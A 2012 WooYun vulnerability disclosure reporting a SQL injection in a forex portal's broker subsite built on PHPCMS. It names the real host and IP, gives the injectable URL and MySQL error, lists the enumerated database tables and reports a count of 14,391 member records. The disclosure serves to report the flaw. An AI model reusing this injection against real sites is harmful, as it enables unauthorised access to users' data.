当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-011587

漏洞标题:某财金门户分站疑似phppcms二次开发导致用户数据泄露

相关厂商:外汇通

漏洞作者: 豆芽

提交时间:2012-08-31 12:46

修复时间:2012-10-15 12:47

公开时间:2012-10-15 12:47

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-10-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

目测是PHPCMS整站程序的问题,未对提交的字符做过滤,导致注入

详细说明:

http://broker.forex.com.cn/brokerinfo.php?id=13


Target: http://broker.forex.com.cn/brokerinfo.php?id=13
Host IP: 58.83.227.60
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.3
DB Server: MySQL >=5
Current DB: newforexbroker

http://broker.forex.com.cn/platforminfo.php?id=13&pid=25'
MySQL Query : SELECT * FROM phpcms_broker_platform p WHERE id = 25'
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
MySQL Errno : 1064
Message : MySQL Query Error

漏洞证明:

Table found: phpcms_admin
Table found: phpcms_admin_role
Table found: phpcms_admin_role_priv
Table found: phpcms_ads
Table found: phpcms_ads_1012
Table found: phpcms_ads_place
Table found: phpcms_ads_stat
Table found: phpcms_announce
Table found: phpcms_area
Table found: phpcms_ask
Table found: phpcms_ask_actor
Table found: phpcms_ask_credit
Table found: phpcms_ask_posts
Table found: phpcms_ask_vote
Table found: phpcms_attachment
Table found: phpcms_author
Table found: phpcms_block
Table found: phpcms_broker_active
Table found: phpcms_broker_app
Table found: phpcms_broker_broker
Table found: phpcms_broker_platform
Table found: phpcms_broker_setuser
Table found: phpcms_broker_toupiao
Table found: phpcms_c_down
Table found: phpcms_c_info
Table found: phpcms_c_ku6video
Table found: phpcms_c_news
Table found: phpcms_c_picture
Table found: phpcms_c_product
Table found: phpcms_c_video
Table found: phpcms_cache_count
Table found: phpcms_category
Table found: phpcms_collect
Table found: phpcms_comment
Table found: phpcms_content
Table found: phpcms_content_count
Table found: phpcms_content_position
Table found: phpcms_content_tag
Table found: phpcms_copyfrom
Table found: phpcms_datasource
Table found: phpcms_digg
Table found: phpcms_digg_log
Table found: phpcms_editor_data
Table found: phpcms_error_report
Table found: phpcms_formguide
Table found: phpcms_formguide_fields
Table found: phpcms_guestbook
Table found: phpcms_hits
Table found: phpcms_ipbanned
Table found: phpcms_keylink
Table found: phpcms_keyword
Table found: phpcms_link
Table found: phpcms_linkage
Table found: phpcms_log
Table found: phpcms_mail
Table found: phpcms_mail_email
Table found: phpcms_mail_email_type
Table found: phpcms_member
Table found: phpcms_member_cache
Table found: phpcms_member_company
Table found: phpcms_member_detail
Table found: phpcms_member_group
Table found: phpcms_member_group_extend
Table found: phpcms_member_group_priv
Table found: phpcms_member_info
Table found: phpcms_menu
Table found: phpcms_message
Table found: phpcms_model
Table found: phpcms_model_field
Table found: phpcms_module
Table found: phpcms_mood
Table found: phpcms_mood_data
Table found: phpcms_order
Table found: phpcms_order_deliver
Table found: phpcms_order_log
Table found: phpcms_pay_card
Table found: phpcms_pay_exchange
Table found: phpcms_pay_payment
Table found: phpcms_pay_pointcard_type
Table found: phpcms_pay_stat
Table found: phpcms_pay_user_account
Table found: phpcms_player
Table found: phpcms_position
Table found: phpcms_process
Table found: phpcms_process_status
Table found: phpcms_role
Table found: phpcms_search
Table found: phpcms_search_type
Table found: phpcms_session
Table found: phpcms_space
Table found: phpcms_space_api
Table found: phpcms_special
Table found: phpcms_special_content
Table found: phpcms_spider_job
Table found: phpcms_spider_sites
Table found: phpcms_spider_urls
Table found: phpcms_status
Table found: phpcms_times
Table found: phpcms_type
Table found: phpcms_urlrule
Table found: phpcms_video
Table found: phpcms_video_count
Table found: phpcms_video_data
Table found: phpcms_video_position
Table found: phpcms_video_special
Table found: phpcms_video_special_list
Table found: phpcms_video_tag
Table found: phpcms_vote_data
Table found: phpcms_vote_option
Table found: phpcms_vote_subject
Table found: phpcms_vote_useroption
Table found: phpcms_workflow
Table found: phpcms_yp_apply
Table found: phpcms_yp_buy
Table found: phpcms_yp_cert
Table found: phpcms_yp_collect
Table found: phpcms_yp_count
Table found: phpcms_yp_guestbook
Table found: phpcms_yp_job
Table found: phpcms_yp_news
Table found: phpcms_yp_product
Table found: phpcms_yp_relation
Table found: phpcms_yp_stats
Table found: phpcms_yp_stock
select count(*) from newforexbroker.phpcms_member
is 14391

修复方案:

过滤参数

版权声明:转载请注明来源 豆芽@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝